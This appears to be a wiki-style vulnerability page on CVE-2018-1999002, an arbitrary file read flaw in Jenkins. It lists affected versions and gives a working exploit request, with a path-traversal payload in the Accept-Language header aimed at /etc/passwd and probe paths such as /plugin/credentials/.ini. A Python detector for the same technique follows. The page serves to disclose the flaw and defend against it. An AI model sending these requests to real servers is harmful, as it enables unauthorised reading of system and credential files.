# CVE-2018-1999002 Arbitrary File Read Vulnerability/zh-cn
==Affected versions==
Jenkins weekly 2.132 and earlier
Jenkins LTS 2.121.1 and earlier
Arbitrary files on a Windows server can be read, and under certain conditions files on a Linux server can be read as well.
==Exploitation==
Anonymous read permission must already be enabled. Add the following to the request headers:
Accept-Language: /../../../../../../../../etc/passwd
For the path handled by the request, e.g. /plugin/xxxx, the following can be tried:
/plugin/jquery-detached/.xml
/plugin/jquery-detached/.key
/plugin/credentials/.ini
Windows:
GET /plugin/credentials/.ini HTTP/1.1
Host: x.x.x.x:8080
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36
Origin: http://x.x.x.x:8080
Referer: http://x.x.x.x:8080/
Accept-Encoding: gzip, deflate
Accept-Language: /../../../../../../../../etc/passwd
Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971
Connection: close
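The header abuse above is easy to spot on the defender's side: Accept-Language is supposed to carry only language ranges (RFC 4647 tags such as zh-CN or *, optionally weighted with ;q=), so any value containing path characters is a traversal attempt. The following detector is an added example, not code from the original page or from Jenkins; it parses a raw HTTP request, flags a non-language Accept-Language value, and flags dotfile probes under /plugin/. The host name and cookie values in the sample are constructed placeholders.

```python
import re

# One RFC 4647 language range ("en", "zh-CN", "*") with an optional RFC 7231 q-weight.
_LANG_RANGE = re.compile(
    r"^(\*|[A-Za-z]{1,8}(-[A-Za-z0-9]{1,8})*)(;\s*q=(0(\.\d{0,3})?|1(\.0{0,3})?))?$"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lower-cased header: value})."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def suspicious_accept_language(value):
    """True if any comma-separated element is not a language range (e.g. contains '/' or '..')."""
    return any(not _LANG_RANGE.match(part.strip()) for part in value.split(","))


def plugin_dotfile_path(path):
    """True for a request for a dotfile directly under /plugin/<name>/, as in the page's probes."""
    return re.match(r"^/plugin/[^/]+/\.[A-Za-z0-9]+$", path) is not None


def assess(raw):
    """Return a list of findings for one request; an empty list means nothing matched."""
    findings = []
    _method, path, headers = parse_request(raw)
    lang = headers.get("accept-language", "")
    if suspicious_accept_language(lang):
        findings.append("accept-language is not a language tag: %r" % lang)
    if plugin_dotfile_path(path):
        findings.append("dotfile probe under /plugin/: %s" % path)
    return findings


# Constructed sample mirroring the page's probe (host and cookie are placeholders).
SAMPLE = ("GET /plugin/credentials/.ini HTTP/1.1\r\nHost: jenkins.example:8080\r\n"
          "Accept-Language: /../../../../../../../../etc/passwd\r\n"
          "Cookie: JSESSIONID.placeholder=example\r\nConnection: close\r\n\r\n")
# Constructed benign request: a normal plugin resource with a real language list.
BENIGN = ("GET /plugin/credentials/images/icon.png HTTP/1.1\r\nHost: jenkins.example:8080\r\n"
          "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n\r\n")
```

Run `assess()` over each request line of a proxy or Jenkins access log; the Accept-Language check alone catches the technique regardless of which /plugin/ path is targeted.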